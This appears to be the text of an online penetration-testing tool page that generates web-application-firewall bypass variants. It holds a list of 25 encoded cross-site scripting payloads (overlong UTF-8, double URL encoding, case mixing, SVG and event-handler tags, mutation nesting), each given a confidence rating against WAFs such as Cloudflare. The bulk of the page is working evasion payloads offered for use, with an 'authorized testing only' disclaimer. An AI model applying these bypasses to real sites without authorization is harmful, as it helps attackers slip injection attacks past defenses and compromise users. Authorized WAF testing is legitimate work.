WAF-Specific Payload Encoder Select a target WAF profile and payload category, then enter a base payload to generate 10-50 targeted bypass variants. Each variant includes the encoding technique, confidence level, and explanation. Supports Cloudflare, AWS WAF, ModSecurity, Akamai, Imperva, F5, Sucuri, and Azure WAF. For authorized testing only.
ALL
Test all WAFs
Unicode normalization
AWS WAF
Regex bypass
Comment injection (/**/)
Encoding chains
Double encoding
Hex encoding
Parameter pollution
Encoding chains
Cloudflare WAF: Cloudflare uses ML-based detection with signature matching. Bypasses exploit Unicode normalization and encoding edge cases.
Unicode normalization Chunked encoding tricks Case mixing UTF-8 overlong encoding HTML entity encoding
XSS SQLi CMDi Path Traversal SSTI SSRF XXE LFI
Leave empty to use the default XSS payload.
All High (9) Med (11) Low (5)
1 Overlong UTF-8 High
%c0%bc%c1%b3%c1%a3%c1%b2%c1%a9%c1%b0%c1%b4%c0%be%c1%a1%c1%ac%c1%a5%c1%b2%c1%b4%c0%a81%c0%a9%c0%bc%c0%af%c1%b3%c1%a3%c1%b2%c1%a9%c1%b0%c1%b4%c0%be
2 JS Unicode Braces High
\u{3c}\u{73}\u{63}\u{72}\u{69}\u{70}\u{74}\u{3e}\u{61}\u{6c}\u{65}\u{72}\u{74}\u{28}\u{31}\u{29}\u{3c}\u{2f}\u{73}\u{63}\u{72}\u{69}\u{70}\u{74}\u{3e}
3 Zero-Width Joiner Med
<script>alert(1)</script>
4 HTML Comment Wrap Low
<!--<script>alert(1)</script>-->
5 Plus-Space Encoding Med
%3Cscript%3Ealert(1)%3C%2Fscript%3E
6 Case Alternation Med
<ScRiPt>aLeRt(1)</sCrIpT>
7 Random Case Mix Med
<scRipt>aLeRT(1)</script>
8 URL Encoding Low
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e
9 Double URL Encoding High
%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574%2528%2531%2529%253c%252f%2573%2563%2572%2569%2570%2574%253e
10 Hex Entity Encoding Med
<script>alert(1)</script>
11 Decimal Entity Encoding Med
<script>alert(1)</script>
12 Unicode Escape Med
\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e
13 Null Byte Injection Med
<script>aler%00t(1)</script>
14 Tab Insertion Low
<script>aler t(1)</script>
15 Newline Insertion Med
<script>aler%0at(1)</script>
16 Base64 Encoding Low
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
17 Reverse Payload Low
>tpircs/<)1(trela>tpircs<
18 Event Handler Tag High
<img src=x onload=alert(1)>
19 SVG onload High
<svg/onload=alert(1)>
20 Body onpageshow Med
<body onpageshow=alert(1)>
21 Details ontoggle High
<details open ontoggle=alert(1)>
22 javascript: Protocol Med
javascript:alert(1)
23 String.fromCharCode() High
String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62)
24 SVG Animate High
<svg><animate onbegin=alert(1) attributeName=x dur=1s>
25 Math/Table Nesting High
<math><mtext><table><mglyph><svg><mtext><textarea><path id=x d="M0,0"><animate attributeName=d values="alert(1)"</textarea>
For authorized security testing only. These encodings are designed for penetration testers evaluating WAF configurations with proper authorization. Unauthorized use against systems you do not own or have permission to test is illegal. All processing happens client-side — no data is sent to any server.